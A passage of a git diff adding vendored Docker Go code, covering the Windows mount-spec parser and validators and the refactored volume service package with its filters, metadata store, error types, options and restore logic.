+	rxDestination = `(?P<destination>((?:\\\\\?\\)?([a-z]):((?:[\\/][^\\/:*?"<>\r\n]+)*[\\/]?))|(` + rxPipe + `))`
+
+	rxLCOWDestination = `(?P<destination>/(?:[^\\/:*?"<>\r\n]+[/]?)*)`
+	// Destination (aka container path):
+	//    -  Variation on hostdir but can be a drive followed by colon as well
+	//    -  If a path, must be absolute. Can include spaces
+	//    -  Drive cannot be c: (explicitly checked in code, not RegEx)
+
+	// rxMode is the regex expression for the mode of the mount
+	// Mode (optional):
+	//    -  Hopefully self explanatory in comparison to above regex's.
+	//    -  Colon is not in the capture group
+	rxMode = `(:(?P<mode>(?i)ro|rw))?`
+)
+
+type mountValidator func(mnt *mount.Mount) error
+
+func windowsSplitRawSpec(raw, destRegex string) ([]string, error) {
+	specExp := regexp.MustCompile(`^` + rxSource + destRegex + rxMode + `$`)
+	match := specExp.FindStringSubmatch(strings.ToLower(raw))
+
+	// Must have something back
+	if len(match) == 0 {
+		return nil, errInvalidSpec(raw)
+	}
+
+	var split []string
+	matchgroups := make(map[string]string)
+	// Pull out the sub expressions from the named capture groups
+	for i, name := range specExp.SubexpNames() {
+		matchgroups[name] = strings.ToLower(match[i])
+	}
+	if source, exists := matchgroups["source"]; exists {
+		if source != "" {
+			split = append(split, source)
+		}
+	}
+	if destination, exists := matchgroups["destination"]; exists {
+		if destination != "" {
+			split = append(split, destination)
+		}
+	}
+	if mode, exists := matchgroups["mode"]; exists {
+		if mode != "" {
+			split = append(split, mode)
+		}
+	}
+	// Fix #26329. If the destination appears to be a file, and the source is null,
+	// it may be because we've fallen through the possible naming regex and hit a
+	// situation where the user intention was to map a file into a container through
+	// a local volume, but this is not supported by the platform.
+	if matchgroups["source"] == "" && matchgroups["destination"] != "" {
+		volExp := regexp.MustCompile(`^` + rxName + `$`)
+		reservedNameExp := regexp.MustCompile(`^` + rxReservedNames + `$`)
+
+		if volExp.MatchString(matchgroups["destination"]) {
+			if reservedNameExp.MatchString(matchgroups["destination"]) {
+				return nil, fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", matchgroups["destination"])
+			}
+		} else {
+
+			exists, isDir, _ := currentFileInfoProvider.fileInfo(matchgroups["destination"])
+			if exists && !isDir {
+				return nil, fmt.Errorf("file '%s' cannot be mapped. Only directories can be mapped on this platform", matchgroups["destination"])
+
+			}
+		}
+	}
+	return split, nil
+}
+
+func windowsValidMountMode(mode string) bool {
+	if mode == "" {
+		return true
+	}
+	return rwModes[strings.ToLower(mode)]
+}
+func windowsValidateNotRoot(p string) error {
+	p = strings.ToLower(strings.Replace(p, `/`, `\`, -1))
+	if p == "c:" || p == `c:\` {
+		return fmt.Errorf("destination path cannot be `c:` or `c:\\`: %v", p)
+	}
+	return nil
+}
+
+var windowsSpecificValidators mountValidator = func(mnt *mount.Mount) error {
+	return windowsValidateNotRoot(mnt.Target)
+}
+
+func windowsValidateRegex(p, r string) error {
+	if regexp.MustCompile(`^` + r + `$`).MatchString(strings.ToLower(p)) {
+		return nil
+	}
+	return fmt.Errorf("invalid mount path: '%s'", p)
+}
+func windowsValidateAbsolute(p string) error {
+	if err := windowsValidateRegex(p, rxDestination); err != nil {
+		return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p)
+	}
+	return nil
+}
+
+func windowsDetectMountType(p string) mount.Type {
+	if strings.HasPrefix(p, `\\.\pipe\`) {
+		return mount.TypeNamedPipe
+	} else if regexp.MustCompile(`^` + rxHostDir + `$`).MatchString(p) {
+		return mount.TypeBind
+	} else {
+		return mount.TypeVolume
+	}
+}
+
+func (p *windowsParser) ReadWrite(mode string) bool {
+	return strings.ToLower(mode) != "ro"
+}
+
+// IsVolumeNameValid checks a volume name in a platform specific manner.
+func (p *windowsParser) ValidateVolumeName(name string) error {
+	nameExp := regexp.MustCompile(`^` + rxName + `$`)
+	if !nameExp.MatchString(name) {
+		return errors.New("invalid volume name")
+	}
+	nameExp = regexp.MustCompile(`^` + rxReservedNames + `$`)
+	if nameExp.MatchString(name) {
+		return fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", name)
+	}
+	return nil
+}
+func (p *windowsParser) ValidateMountConfig(mnt *mount.Mount) error {
+	return p.validateMountConfigReg(mnt, rxDestination, windowsSpecificValidators)
+}
+
+type fileInfoProvider interface {
+	fileInfo(path string) (exist, isDir bool, err error)
+}
+
+type defaultFileInfoProvider struct {
+}
+
+func (defaultFileInfoProvider) fileInfo(path string) (exist, isDir bool, err error) {
+	fi, err := os.Stat(path)
+	if err != nil {
+		if !os.IsNotExist(err) {
+			return false, false, err
+		}
+		return false, false, nil
+	}
+	return true, fi.IsDir(), nil
+}
+
+var currentFileInfoProvider fileInfoProvider = defaultFileInfoProvider{}
+
+func (p *windowsParser) validateMountConfigReg(mnt *mount.Mount, destRegex string, additionalValidators ...mountValidator) error {
+
+	for _, v := range additionalValidators {
+		if err := v(mnt); err != nil {
+			return &errMountConfig{mnt, err}
+		}
+	}
+	if len(mnt.Target) == 0 {
+		return &errMountConfig{mnt, errMissingField("Target")}
+	}
+
+	if err := windowsValidateRegex(mnt.Target, destRegex); err != nil {
+		return &errMountConfig{mnt, err}
+	}
+
+	switch mnt.Type {
+	case mount.TypeBind:
+		if len(mnt.Source) == 0 {
+			return &errMountConfig{mnt, errMissingField("Source")}
+		}
+		// Don't error out just because the propagation mode is not supported on the platform
+		if opts := mnt.BindOptions; opts != nil {
+			if len(opts.Propagation) > 0 {
+				return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)}
+			}
+		}
+		if mnt.VolumeOptions != nil {
+			return &errMountConfig{mnt, errExtraField("VolumeOptions")}
+		}
+
+		if err := windowsValidateAbsolute(mnt.Source); err != nil {
+			return &errMountConfig{mnt, err}
+		}
+
+		exists, isdir, err := currentFileInfoProvider.fileInfo(mnt.Source)
+		if err != nil {
+			return &errMountConfig{mnt, err}
+		}
+		if !exists {
+			return &errMountConfig{mnt, errBindSourceDoesNotExist(mnt.Source)}
+		}
+		if !isdir {
+			return &errMountConfig{mnt, fmt.Errorf("source path must be a directory")}
+		}
+
+	case mount.TypeVolume:
+		if mnt.BindOptions != nil {
+			return &errMountConfig{mnt, errExtraField("BindOptions")}
+		}
+
+		if len(mnt.Source) == 0 && mnt.ReadOnly {
+			return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")}
+		}
+
+		if len(mnt.Source) != 0 {
+			if err := p.ValidateVolumeName(mnt.Source); err != nil {
+				return &errMountConfig{mnt, err}
+			}
+		}
+	case mount.TypeNamedPipe:
+		if len(mnt.Source) == 0 {
+			return &errMountConfig{mnt, errMissingField("Source")}
+		}
+
+		if mnt.BindOptions != nil {
+			return &errMountConfig{mnt, errExtraField("BindOptions")}
+		}
+
+		if mnt.ReadOnly {
+			return &errMountConfig{mnt, errExtraField("ReadOnly")}
+		}
+
+		if windowsDetectMountType(mnt.Source) != mount.TypeNamedPipe {
+			return &errMountConfig{mnt, fmt.Errorf("'%s' is not a valid pipe path", mnt.Source)}
+		}
+
+		if windowsDetectMountType(mnt.Target) != mount.TypeNamedPipe {
+			return &errMountConfig{mnt, fmt.Errorf("'%s' is not a valid pipe path", mnt.Target)}
+		}
+	default:
+		return &errMountConfig{mnt, errors.New("mount type unknown")}
+	}
+	return nil
+}
+func (p *windowsParser) ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) {
+	return p.parseMountRaw(raw, volumeDriver, rxDestination, true, windowsSpecificValidators)
+}
+
+func (p *windowsParser) parseMountRaw(raw, volumeDriver, destRegex string, convertTargetToBackslash bool, additionalValidators ...mountValidator) (*MountPoint, error) {
+	arr, err := windowsSplitRawSpec(raw, destRegex)
+	if err != nil {
+		return nil, err
+	}
+
+	var spec mount.Mount
+	var mode string
+	switch len(arr) {
+	case 1:
+		// Just a destination path in the container
+		spec.Target = arr[0]
+	case 2:
+		if windowsValidMountMode(arr[1]) {
+			// Destination + Mode is not a valid volume - volumes
+			// cannot include a mode. e.g. /foo:rw
+			return nil, errInvalidSpec(raw)
+		}
+		// Host Source Path or Name + Destination
+		spec.Source = strings.Replace(arr[0], `/`, `\`, -1)
+		spec.Target = arr[1]
+	case 3:
+		// HostSourcePath+DestinationPath+Mode
+		spec.Source = strings.Replace(arr[0], `/`, `\`, -1)
+		spec.Target = arr[1]
+		mode = arr[2]
+	default:
+		return nil, errInvalidSpec(raw)
+	}
+	if convertTargetToBackslash {
+		spec.Target = strings.Replace(spec.Target, `/`, `\`, -1)
+	}
+
+	if !windowsValidMountMode(mode) {
+		return nil, errInvalidMode(mode)
+	}
+
+	spec.Type = windowsDetectMountType(spec.Source)
+	spec.ReadOnly = !p.ReadWrite(mode)
+
+	// cannot assume that if a volume driver is passed in that we should set it
+	if volumeDriver != "" && spec.Type == mount.TypeVolume {
+		spec.VolumeOptions = &mount.VolumeOptions{
+			DriverConfig: &mount.Driver{Name: volumeDriver},
+		}
+	}
+
+	if copyData, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet {
+		if spec.VolumeOptions == nil {
+			spec.VolumeOptions = &mount.VolumeOptions{}
+		}
+		spec.VolumeOptions.NoCopy = !copyData
+	}
+
+	mp, err := p.parseMountSpec(spec, destRegex, convertTargetToBackslash, additionalValidators...)
+	if mp != nil {
+		mp.Mode = mode
+	}
+	if err != nil {
+		err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err)
+	}
+	return mp, err
+}
+
+func (p *windowsParser) ParseMountSpec(cfg mount.Mount) (*MountPoint, error) {
+	return p.parseMountSpec(cfg, rxDestination, true, windowsSpecificValidators)
+}
+func (p *windowsParser) parseMountSpec(cfg mount.Mount, destRegex string, convertTargetToBackslash bool, additionalValidators ...mountValidator) (*MountPoint, error) {
+	if err := p.validateMountConfigReg(&cfg, destRegex, additionalValidators...); err != nil {
+		return nil, err
+	}
+	mp := &MountPoint{
+		RW:          !cfg.ReadOnly,
+		Destination: cfg.Target,
+		Type:        cfg.Type,
+		Spec:        cfg,
+	}
+	if convertTargetToBackslash {
+		mp.Destination = strings.Replace(cfg.Target, `/`, `\`, -1)
+	}
+
+	switch cfg.Type {
+	case mount.TypeVolume:
+		if cfg.Source == "" {
+			mp.Name = stringid.GenerateNonCryptoID()
+		} else {
+			mp.Name = cfg.Source
+		}
+		mp.CopyData = p.DefaultCopyMode()
+
+		if cfg.VolumeOptions != nil {
+			if cfg.VolumeOptions.DriverConfig != nil {
+				mp.Driver = cfg.VolumeOptions.DriverConfig.Name
+			}
+			if cfg.VolumeOptions.NoCopy {
+				mp.CopyData = false
+			}
+		}
+	case mount.TypeBind:
+		mp.Source = strings.Replace(cfg.Source, `/`, `\`, -1)
+	case mount.TypeNamedPipe:
+		mp.Source = strings.Replace(cfg.Source, `/`, `\`, -1)
+	}
+	// cleanup trailing `\` except for paths like `c:\`
+	if len(mp.Source) > 3 && mp.Source[len(mp.Source)-1] == '\\' {
+		mp.Source = mp.Source[:len(mp.Source)-1]
+	}
+	if len(mp.Destination) > 3 && mp.Destination[len(mp.Destination)-1] == '\\' {
+		mp.Destination = mp.Destination[:len(mp.Destination)-1]
+	}
+	return mp, nil
+}
+
+func (p *windowsParser) ParseVolumesFrom(spec string) (string, string, error) {
+	if len(spec) == 0 {
+		return "", "", fmt.Errorf("volumes-from specification cannot be an empty string")
+	}
+
+	specParts := strings.SplitN(spec, ":", 2)
+	id := specParts[0]
+	mode := "rw"
+
+	if len(specParts) == 2 {
+		mode = specParts[1]
+		if !windowsValidMountMode(mode) {
+			return "", "", errInvalidMode(mode)
+		}
+
+		// Do not allow copy modes on volumes-from
+		if _, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet {
+			return "", "", errInvalidMode(mode)
+		}
+	}
+	return id, mode, nil
+}
+
+func (p *windowsParser) DefaultPropagationMode() mount.Propagation {
+	return mount.Propagation("")
+}
+
+func (p *windowsParser) ConvertTmpfsOptions(opt *mount.TmpfsOptions, readOnly bool) (string, error) {
+	return "", fmt.Errorf("%s does not support tmpfs", runtime.GOOS)
+}
+func (p *windowsParser) DefaultCopyMode() bool {
+	return false
+}
+func (p *windowsParser) IsBackwardCompatible(m *MountPoint) bool {
+	return false
+}
+
+func (p *windowsParser) ValidateTmpfsMountDestination(dest string) error {
+	return errors.New("Platform does not support tmpfs")
+}
diff --git a/vendor/github.com/docker/docker/volume/service/by.go b/vendor/github.com/docker/docker/volume/service/by.go
new file mode 100644
index 0000000000..c5a4638d2a
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/by.go
@@ -0,0 +1,89 @@
+package service // import "github.com/docker/docker/volume/service"
+
+import (
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/volume"
+)
+
+// By is an interface which is used to implement filtering on volumes.
+type By interface {
+	isBy()
+}
+
+// ByDriver is `By` that filters based on the driver names that are passed in
+func ByDriver(drivers ...string) By {
+	return byDriver(drivers)
+}
+
+type byDriver []string
+
+func (byDriver) isBy() {}
+
+// ByReferenced is a `By` that filters based on if the volume has references
+type ByReferenced bool
+
+func (ByReferenced) isBy() {}
+
+// And creates a `By` combining all the passed in bys using AND logic.
+func And(bys ...By) By {
+	and := make(andCombinator, 0, len(bys))
+	for _, by := range bys {
+		and = append(and, by)
+	}
+	return and
+}
+
+type andCombinator []By
+
+func (andCombinator) isBy() {}
+
+// Or creates a `By` combining all the passed in bys using OR logic.
+func Or(bys ...By) By {
+	or := make(orCombinator, 0, len(bys))
+	for _, by := range bys {
+		or = append(or, by)
+	}
+	return or
+}
+
+type orCombinator []By
+
+func (orCombinator) isBy() {}
+
+// CustomFilter is a `By` that is used by callers to provide custom filtering
+// logic.
+type CustomFilter filterFunc
+
+func (CustomFilter) isBy() {}
+
+// FromList returns a By which sets the initial list of volumes to use
+func FromList(ls *[]volume.Volume, by By) By {
+	return &fromList{by: by, ls: ls}
+}
+
+type fromList struct {
+	by By
+	ls *[]volume.Volume
+}
+
+func (fromList) isBy() {}
+
+func byLabelFilter(filter filters.Args) By {
+	return CustomFilter(func(v volume.Volume) bool {
+		dv, ok := v.(volume.DetailedVolume)
+		if !ok {
+			return false
+		}
+
+		labels := dv.Labels()
+		if !filter.MatchKVList("label", labels) {
+			return false
+		}
+		if filter.Contains("label!") {
+			if filter.MatchKVList("label!", labels) {
+				return false
+			}
+		}
+		return true
+	})
+}
diff --git a/vendor/github.com/docker/docker/volume/service/convert.go b/vendor/github.com/docker/docker/volume/service/convert.go
new file mode 100644
index 0000000000..2967dc6722
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/convert.go
@@ -0,0 +1,132 @@
+package service
+
+import (
+	"context"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/pkg/directory"
+	"github.com/docker/docker/volume"
+	"github.com/sirupsen/logrus"
+)
+
+// convertOpts are used to pass options to `volumeToAPI`
+type convertOpt interface {
+	isConvertOpt()
+}
+
+type useCachedPath bool
+
+func (useCachedPath) isConvertOpt() {}
+
+type calcSize bool
+
+func (calcSize) isConvertOpt() {}
+
+type pathCacher interface {
+	CachedPath() string
+}
+
+func (s *VolumesService) volumesToAPI(ctx context.Context, volumes []volume.Volume, opts ...convertOpt) []*types.Volume {
+	var (
+		out        = make([]*types.Volume, 0, len(volumes))
+		getSize    bool
+		cachedPath bool
+	)
+
+	for _, o := range opts {
+		switch t := o.(type) {
+		case calcSize:
+			getSize = bool(t)
+		case useCachedPath:
+			cachedPath = bool(t)
+		}
+	}
+	for _, v := range volumes {
+		select {
+		case <-ctx.Done():
+			return nil
+		default:
+		}
+		apiV := volumeToAPIType(v)
+
+		if cachedPath {
+			if vv, ok := v.(pathCacher); ok {
+				apiV.Mountpoint = vv.CachedPath()
+			}
+		} else {
+			apiV.Mountpoint = v.Path()
+		}
+
+		if getSize {
+			p := v.Path()
+			if apiV.Mountpoint == "" {
+				apiV.Mountpoint = p
+			}
+			sz, err := directory.Size(ctx, p)
+			if err != nil {
+				logrus.WithError(err).WithField("volume", v.Name()).Warnf("Failed to determine size of volume")
+				sz = -1
+			}
+			apiV.UsageData = &types.VolumeUsageData{Size: sz, RefCount: int64(s.vs.CountReferences(v))}
+		}
+
+		out = append(out, &apiV)
+	}
+	return out
+}
+
+func volumeToAPIType(v volume.Volume) types.Volume {
+	createdAt, _ := v.CreatedAt()
+	tv := types.Volume{
+		Name:      v.Name(),
+		Driver:    v.DriverName(),
+		CreatedAt: createdAt.Format(time.RFC3339),
+	}
+	if v, ok := v.(volume.DetailedVolume); ok {
+		tv.Labels = v.Labels()
+		tv.Options = v.Options()
+		tv.Scope = v.Scope()
+	}
+	if cp, ok := v.(pathCacher); ok {
+		tv.Mountpoint = cp.CachedPath()
+	}
+	return tv
+}
+
+func filtersToBy(filter filters.Args, acceptedFilters map[string]bool) (By, error) {
+	if err := filter.Validate(acceptedFilters); err != nil {
+		return nil, err
+	}
+	var bys []By
+	if drivers := filter.Get("driver"); len(drivers) > 0 {
+		bys = append(bys, ByDriver(drivers...))
+	}
+	if filter.Contains("name") {
+		bys = append(bys, CustomFilter(func(v volume.Volume) bool {
+			return filter.Match("name", v.Name())
+		}))
+	}
+	bys = append(bys, byLabelFilter(filter))
+
+	if filter.Contains("dangling") {
+		var dangling bool
+		if filter.ExactMatch("dangling", "true") || filter.ExactMatch("dangling", "1") {
+			dangling = true
+		} else if !filter.ExactMatch("dangling", "false") && !filter.ExactMatch("dangling", "0") {
+			return nil, invalidFilter{"dangling", filter.Get("dangling")}
+		}
+		bys = append(bys, ByReferenced(!dangling))
+	}
+
+	var by By
+	switch len(bys) {
+	case 0:
+	case 1:
+		by = bys[0]
+	default:
+		by = And(bys...)
+	}
+	return by, nil
+}
diff --git a/vendor/github.com/docker/docker/volume/store/db.go b/vendor/github.com/docker/docker/volume/service/db.go
similarity index 84%
rename from vendor/github.com/docker/docker/volume/store/db.go
rename to vendor/github.com/docker/docker/volume/service/db.go
index c5fd1643f5..3b31f7bf14 100644
--- a/vendor/github.com/docker/docker/volume/store/db.go
+++ b/vendor/github.com/docker/docker/volume/service/db.go
@@ -1,11 +1,12 @@
-package store
+package service // import "github.com/docker/docker/volume/service"
 
 import (
 	"encoding/json"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/boltdb/bolt"
+	"github.com/docker/docker/errdefs"
 	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 var volumeBucketName = []byte("volumes")
@@ -28,7 +29,10 @@ func setMeta(tx *bolt.Tx, name string, meta volumeMetadata) error {
 	if err != nil {
 		return err
 	}
-	b := tx.Bucket(volumeBucketName)
+	b, err := tx.CreateBucketIfNotExists(volumeBucketName)
+	if err != nil {
+		return errors.Wrap(err, "error creating volume bucket")
+	}
 	return errors.Wrap(b.Put([]byte(name), metaJSON), "error setting volume metadata")
 }
 
@@ -42,8 +46,11 @@ func (s *VolumeStore) getMeta(name string) (volumeMetadata, error) {
 
 func getMeta(tx *bolt.Tx, name string, meta *volumeMetadata) error {
 	b := tx.Bucket(volumeBucketName)
+	if b == nil {
+		return errdefs.NotFound(errors.New("volume bucket does not exist"))
+	}
 	val := b.Get([]byte(name))
-	if string(val) == "" {
+	if len(val) == 0 {
 		return nil
 	}
 	if err := json.Unmarshal(val, meta); err != nil {
diff --git a/vendor/github.com/docker/docker/volume/service/db_test.go b/vendor/github.com/docker/docker/volume/service/db_test.go
new file mode 100644
index 0000000000..4cac9176b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/db_test.go
@@ -0,0 +1,52 @@
+package service // import "github.com/docker/docker/volume/service"
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+	"time"
+
+	"github.com/boltdb/bolt"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestSetGetMeta(t *testing.T) {
+	t.Parallel()
+
+	dir, err := ioutil.TempDir("", "test-set-get")
+	assert.NilError(t, err)
+	defer os.RemoveAll(dir)
+
+	db, err := bolt.Open(filepath.Join(dir, "db"), 0600, &bolt.Options{Timeout: 1 * time.Second})
+	assert.NilError(t, err)
+
+	store := &VolumeStore{db: db}
+
+	_, err = store.getMeta("test")
+	assert.Assert(t, is.ErrorContains(err, ""))
+
+	err = db.Update(func(tx *bolt.Tx) error {
+		_, err := tx.CreateBucket(volumeBucketName)
+		return err
+	})
+	assert.NilError(t, err)
+
+	meta, err := store.getMeta("test")
+	assert.NilError(t, err)
+	assert.DeepEqual(t, volumeMetadata{}, meta)
+
+	testMeta := volumeMetadata{
+		Name:    "test",
+		Driver:  "fake",
+		Labels:  map[string]string{"a": "1", "b": "2"},
+		Options: map[string]string{"foo": "bar"},
+	}
+	err = store.setMeta("test", testMeta)
+	assert.NilError(t, err)
+
+	meta, err = store.getMeta("test")
+	assert.NilError(t, err)
+	assert.DeepEqual(t, testMeta, meta)
+}
diff --git a/vendor/github.com/docker/docker/volume/service/default_driver.go b/vendor/github.com/docker/docker/volume/service/default_driver.go
new file mode 100644
index 0000000000..1c1d5c54bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/default_driver.go
@@ -0,0 +1,21 @@
+// +build linux windows
+
+package service // import "github.com/docker/docker/volume/service"
+import (
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/volume"
+	"github.com/docker/docker/volume/drivers"
+	"github.com/docker/docker/volume/local"
+	"github.com/pkg/errors"
+)
+
+func setupDefaultDriver(store *drivers.Store, root string, rootIDs idtools.IDPair) error {
+	d, err := local.New(root, rootIDs)
+	if err != nil {
+		return errors.Wrap(err, "error setting up default driver")
+	}
+	if !store.Register(d, volume.DefaultDriverName) {
+		return errors.New("local volume driver could not be registered")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/volume/service/default_driver_stubs.go b/vendor/github.com/docker/docker/volume/service/default_driver_stubs.go
new file mode 100644
index 0000000000..fdb275eb9d
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/default_driver_stubs.go
@@ -0,0 +1,10 @@
+// +build !linux,!windows
+
+package service // import "github.com/docker/docker/volume/service"
+
+import (
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/volume/drivers"
+)
+
+func setupDefaultDriver(_ *drivers.Store, _ string, _ idtools.IDPair) error { return nil }
diff --git a/vendor/github.com/docker/docker/volume/store/errors.go b/vendor/github.com/docker/docker/volume/service/errors.go
similarity index 65%
rename from vendor/github.com/docker/docker/volume/store/errors.go
rename to vendor/github.com/docker/docker/volume/service/errors.go
index 980175f29c..ce2d678dab 100644
--- a/vendor/github.com/docker/docker/volume/store/errors.go
+++ b/vendor/github.com/docker/docker/volume/service/errors.go
@@ -1,22 +1,34 @@
-package store
+package service // import "github.com/docker/docker/volume/service"
 
 import (
+	"fmt"
 	"strings"
-
-	"github.com/pkg/errors"
 )
 
-var (
+const (
 	// errVolumeInUse is a typed error returned when trying to remove a volume that is currently in use by a container
-	errVolumeInUse = errors.New("volume is in use")
+	errVolumeInUse conflictError = "volume is in use"
 	// errNoSuchVolume is a typed error returned if the requested volume doesn't exist in the volume store
-	errNoSuchVolume = errors.New("no such volume")
-	// errInvalidName is a typed error returned when creating a volume with a name that is not valid on the platform
-	errInvalidName = errors.New("volume name is not valid on this platform")
+	errNoSuchVolume notFoundError = "no such volume"
 	// errNameConflict is a typed error returned on create when a volume exists with the given name, but for a different driver
-	errNameConflict = errors.New("volume name must be unique")
+	errNameConflict conflictError = "volume name must be unique"
 )
 
+type conflictError string
+
+func (e conflictError) Error() string {
+	return string(e)
+}
+func (conflictError) Conflict() {}
+
+type notFoundError string
+
+func (e notFoundError) Error() string {
+	return string(e)
+}
+
+func (notFoundError) NotFound() {}
+
 // OpErr is the error type returned by functions in the store package. It describes
 // the operation, volume name, and error.
 type OpErr struct {
@@ -47,6 +59,11 @@ func (e *OpErr) Error() string {
 	return s
 }
 
+// Cause returns the error the caused this error
+func (e *OpErr) Cause() error {
+	return e.Err
+}
+
 // IsInUse returns a boolean indicating whether the error indicates that a
 // volume is in use
 func IsInUse(err error) bool {
@@ -64,13 +81,31 @@ func IsNameConflict(err error) bool {
 	return isErr(err, errNameConflict)
 }
 
+type causal interface {
+	Cause() error
+}
+
 func isErr(err error, expected error) bool {
-	err = errors.Cause(err)
 	switch pe := err.(type) {
 	case nil:
 		return false
-	case *OpErr:
-		err = errors.Cause(pe.Err)
+	case causal:
+		return isErr(pe.Cause(), expected)
 	}
 	return err == expected
 }
+
+type invalidFilter struct {
+	filter string
+	value  interface{}
+}
+
+func (e invalidFilter) Error() string {
+	msg := "Invalid filter '" + e.filter
+	if e.value != nil {
+		msg += fmt.Sprintf("=%s", e.value)
+	}
+	return msg + "'"
+}
+
+func (e invalidFilter) InvalidParameter() {}
diff --git a/vendor/github.com/docker/docker/volume/service/opts/opts.go b/vendor/github.com/docker/docker/volume/service/opts/opts.go
new file mode 100644
index 0000000000..6c7e5f4ea6
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/opts/opts.go
@@ -0,0 +1,89 @@
+package opts
+
+// CreateOption is used to pass options in when creating a volume
+type CreateOption func(*CreateConfig)
+
+// CreateConfig is the set of config options that can be set when creating
+// a volume
+type CreateConfig struct {
+	Options   map[string]string
+	Labels    map[string]string
+	Reference string
+}
+
+// WithCreateLabels creates a CreateOption which sets the labels to the
+// passed in value
+func WithCreateLabels(labels map[string]string) CreateOption {
+	return func(cfg *CreateConfig) {
+		cfg.Labels = labels
+	}
+}
+
+// WithCreateOptions creates a CreateOption which sets the options passed
+// to the volume driver when creating a volume to the options passed in.
+func WithCreateOptions(opts map[string]string) CreateOption {
+	return func(cfg *CreateConfig) {
+		cfg.Options = opts
+	}
+}
+
+// WithCreateReference creats a CreateOption which sets a reference to use
+// when creating a volume. This ensures that the volume is created with a reference
+// already attached to it to prevent race conditions with Create and volume cleanup.
+func WithCreateReference(ref string) CreateOption {
+	return func(cfg *CreateConfig) {
+		cfg.Reference = ref
+	}
+}
+
+// GetConfig is used with `GetOption` to set options for the volumes service's
+// `Get` implementation.
+type GetConfig struct {
+	Driver        string
+	Reference     string
+	ResolveStatus bool
+}
+
+// GetOption is passed to the service `Get` add extra details on the get request
+type GetOption func(*GetConfig)
+
+// WithGetDriver provides the driver to get the volume from
+// If no driver is provided to `Get`, first the available metadata is checked
+// to see which driver it belongs to, if that is not available all drivers are
+// probed to find the volume.
+func WithGetDriver(name string) GetOption {
+	return func(o *GetConfig) {
+		o.Driver = name
+	}
+}
+
+// WithGetReference indicates to `Get` to increment the reference count for the
+// retreived volume with the provided reference ID.
+func WithGetReference(ref string) GetOption {
+	return func(o *GetConfig) {
+		o.Reference = ref
+	}
+}
+
+// WithGetResolveStatus indicates to `Get` to also fetch the volume status.
+// This can cause significant overhead in the volume lookup.
+func WithGetResolveStatus(cfg *GetConfig) {
+	cfg.ResolveStatus = true
+}
+
+// RemoveConfig is used by `RemoveOption` to store config options for remove
+type RemoveConfig struct {
+	PurgeOnError bool
+}
+
+// RemoveOption is used to pass options to the volumes service `Remove` implementation
+type RemoveOption func(*RemoveConfig)
+
+// WithPurgeOnError is an option passed to `Remove` which will purge all cached
+// data about a volume even if there was an error while attempting to remove the
+// volume.
+func WithPurgeOnError(b bool) RemoveOption {
+	return func(o *RemoveConfig) {
+		o.PurgeOnError = b
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/store/restore.go b/vendor/github.com/docker/docker/volume/service/restore.go
similarity index 85%
rename from vendor/github.com/docker/docker/volume/store/restore.go
rename to vendor/github.com/docker/docker/volume/service/restore.go
index c0c5b519bc..55c66c4f42 100644
--- a/vendor/github.com/docker/docker/volume/store/restore.go
+++ b/vendor/github.com/docker/docker/volume/service/restore.go
@@ -1,12 +1,12 @@
-package store
+package service // import "github.com/docker/docker/volume/service"
 
 import (
+	"context"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/boltdb/bolt"
 	"github.com/docker/docker/volume"
-	"github.com/docker/docker/volume/drivers"
+	"github.com/sirupsen/logrus"
 )
 
 // restore is called when a new volume store is created.
@@ -21,6 +21,7 @@ func (s *VolumeStore) restore() {
 		ls = listMeta(tx)
 		return nil
 	})
+	ctx := context.Background()
 
 	chRemove := make(chan *volumeMetadata, len(ls))
 	var wg sync.WaitGroup
@@ -33,7 +34,7 @@ func (s *VolumeStore) restore() {
 			var v volume.Volume
 			var err error
 			if meta.Driver != "" {
-				v, err = lookupVolume(meta.Driver, meta.Name)
+				v, err = lookupVolume(ctx, s.drivers, meta.Driver, meta.Name)
 				if err != nil && err != errNoSuchVolume {
 					logrus.WithError(err).WithField("driver", meta.Driver).WithField("volume", meta.Name).Warn("Error restoring volume")
 					return
@@ -44,7 +45,7 @@ func (s *VolumeStore) restore() {
 					return
 				}
 			} else {
-				v, err = s.getVolume(meta.Name)
+				v, err = s.getVolume(ctx, meta.Name, meta.Driver)
 				if err != nil {
 					if err == errNoSuchVolume {
 						chRemove <- &meta
@@ -59,13 +60,14 @@ func (s *VolumeStore) restore() {
 			}
 
 			// increment driver refcount
-			volumedrivers.CreateDriver(meta.Driver)
+			s.drivers.CreateDriver(meta.Driver)
 
 			// cache the volume
 			s.globalLock.Lock()
 			s.options[v.Name()] = meta.Options
 			s.labels[v.Name()] = meta.Labels
 			s.names[v.Name()] = v
+			s.refs[v.Name()] = make(map[string]struct{})
 			s.globalLock.Unlock()
 		}(meta)
 	}
diff --git a/vendor/github.com/docker/docker/volume/service/restore_test.go b/vendor/github.com/docker/docker/volume/service/restore_test.go
new file mode 100644
index 0000000000..95420d9586
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/restore_test.go
@@ -0,0 +1,58 @@
+package service // import "github.com/docker/docker/volume/service"
+
+import (
